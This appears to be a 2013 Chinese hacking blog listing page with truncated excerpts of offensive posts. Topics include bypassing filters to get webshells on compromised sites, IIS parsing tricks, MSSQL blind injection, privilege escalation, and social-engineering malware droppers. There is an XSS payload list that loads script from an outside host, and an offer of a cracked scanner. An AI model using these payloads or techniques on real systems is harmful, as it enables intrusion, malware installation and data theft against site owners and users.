• 另类突破数据库备份过滤拿shell

    另类突破数据库备份过滤拿shell
    苦逼的黑阔们,你是否和我一样深夜一个人在电脑前默默研究技术! 直接进入主题,尼玛跑一个C段好不容易找到一个有注入的站点,下面你懂的,各种神器跑注入,果断找了人后台密码破解成功。 登录,到处查找上传点,编辑器类型,数据库备份等。 无奈的事情发生了,上传不解析,数据库备份过滤了asp.asa等各种过滤,就连大写ASP,ASA都被过滤! 基友怎么办?排除法,上传不解析,抓...阅读全文
    作者:qxz_xp | 发布:2013年12月16日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 关于社会工程学攻击的一次探索(下)

    关于社会工程学攻击的一次探索(下)
    话说上回我们不仅得知了目标的基础信息还得到了目标的IP,这么做当然不能满足黑客的好奇心,攻击者们会通过键盘记录器或远控软件进一步的获得敏感信息。 比如我精心准备了一个Word文件和一个恶意的exe程序。   我们使用Winrar制作一个自解压文件:     我们将恶意软件解压到C:\ProgramData\Microsoft   添加解压后运行: 余下的几个步骤: 别忘找...阅读全文
    作者:qxz_xp | 发布:2013年12月16日 | 分类:社工相关, 黑客攻防 | 暂无评论
    阅读全文

  • phpcms v9前台上传头像getshell

    phpcms v9前台上传头像getshell
    phpcms v9前台会员中心上传头像可getshell。最开始是11月27号,突然看到一枚补丁。说是前台上传头像可getshell.立马被吸引住了。通过两份补丁的对比,发现在处理压缩包的过程中出现了一段删除当前文件夹下的全部文件夹。然后就菊花一紧。通过通读代码,发现上传的过程是 用户上传头像—通过flash里面的js把当前的头像处理成三张不同的格式,然后压缩 用户点击保存的时...阅读全文
    作者:qxz_xp | 发布:2013年12月15日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 腾讯成黑客攻击主要目标

    腾讯成黑客攻击主要目标
    腾讯成黑客攻击主要目标 10起中有7起 首届互联网与刑事司法高端论坛昨日在深圳举行。论坛透露,腾讯等互联网企业和大型公司成了黑客攻击的主要目标。 本次论坛由腾讯公司、深圳大学法学院、深圳市人民检察院知识产权刑事法律保护研究中心联合举办。据深圳市人民检察院检察官张孟东介绍,深圳的网络犯罪近年整体呈上升趋势,今年前10个月批捕的犯罪嫌疑人已超过去年总和,其...阅读全文
    作者:qxz_xp | 发布:2013年12月13日 | 分类:业界新闻, 黑客攻防 | 暂无评论
    阅读全文

  • 浅谈域内渗透基本技巧

    浅谈域内渗透基本技巧
    1、什么是域 有人说域是一种组织结构,是个安全边界。域也有另为一个名字,“活动目录”。不管域是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为域就是建立在计算机上的。加入域里的计算机,共享文件,共享上网就会很方便。 域里有个比较重要的角色,域控制器(DC)。它有至高无上的权限,它可以在域里对其他...阅读全文
    作者:qxz_xp | 发布:2013年12月13日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 在过滤单引号的条件下进行mssql盲注

    在过滤单引号的条件下进行mssql盲注
    最近碰到一个情况,在无报错的情况下,对未知复杂表名进行注入,且过滤了单引号和常见小写的注入关键词。当时搞的时候很是头疼,于是在解决之后很想与大家分享一下,没啥高深的技术,大牛们见笑了。 为了方便看,我先忽略掉过滤了单引号这个条件,后面会详细说明如何突破。 ======================================================================= 1.mssql盲注 x.asp?id...阅读全文
    作者:qxz_xp | 发布:2013年12月13日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 安全扫描器Acunetix Web Vulnerability Scanner 9.x 破解版

    安全扫描器Acunetix Web Vulnerability Scanner 9.x 破解版
    国外知名Web应用安全扫描器Acunetix Web Vulnerability Scanner 9.x 破解版    安全扫描器Acunetix Web Vulnerability Scanner 9.x 是一款网络漏洞扫描工具。通过网络爬虫测试你的网站安全,检测流行的攻击 ,如交叉站点脚本,sql 注入等。在被黑客攻击前扫描购物车,表格、安全区域和其他Web应用程序。75% 的互联网攻击目标是基于Web的应用程序。因为他们时常接触机密数据并...阅读全文
    作者:qxz_xp | 发布:2013年12月11日 | 分类:黑客工具, 黑客攻防 | 暂无评论
    阅读全文

  • 详解webshell提权服务器的21种方法

    详解webshell提权服务器的21种方法
    详解webshell提权服务器的21种方法 1.radmin连接法   条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。   2.pcanywhere   C:\Documents and Settings\All Users\application Data\Symantec\pcAnywhere\ 这里下他的GIF文件,在本地安装pcanywhere上去 3.SAM破解   C:\WINNT\syste...阅读全文
    作者:qxz_xp | 发布:2013年12月11日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 各大网站服务器iis解析漏洞总汇

    各大网站服务器iis解析漏洞总汇
    各大网站服务器iis解析漏洞总汇 [+]IIS 6.0 目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码 IIS6.0会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名) IIS6.0都会把此类后缀文件成功解析为 asp 文件。默认解析:/xx.asa /xx.cer /xx.cdx IIS6.0默认的可执行文件除了 asp 还包含这三种此处...阅读全文
    作者:qxz_xp | 发布:2013年12月11日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • xss跨站脚本攻击汇集

    xss跨站脚本攻击汇集
    xss跨站脚本攻击汇集 (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号)...阅读全文
    作者:qxz_xp | 发布:2013年12月09日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文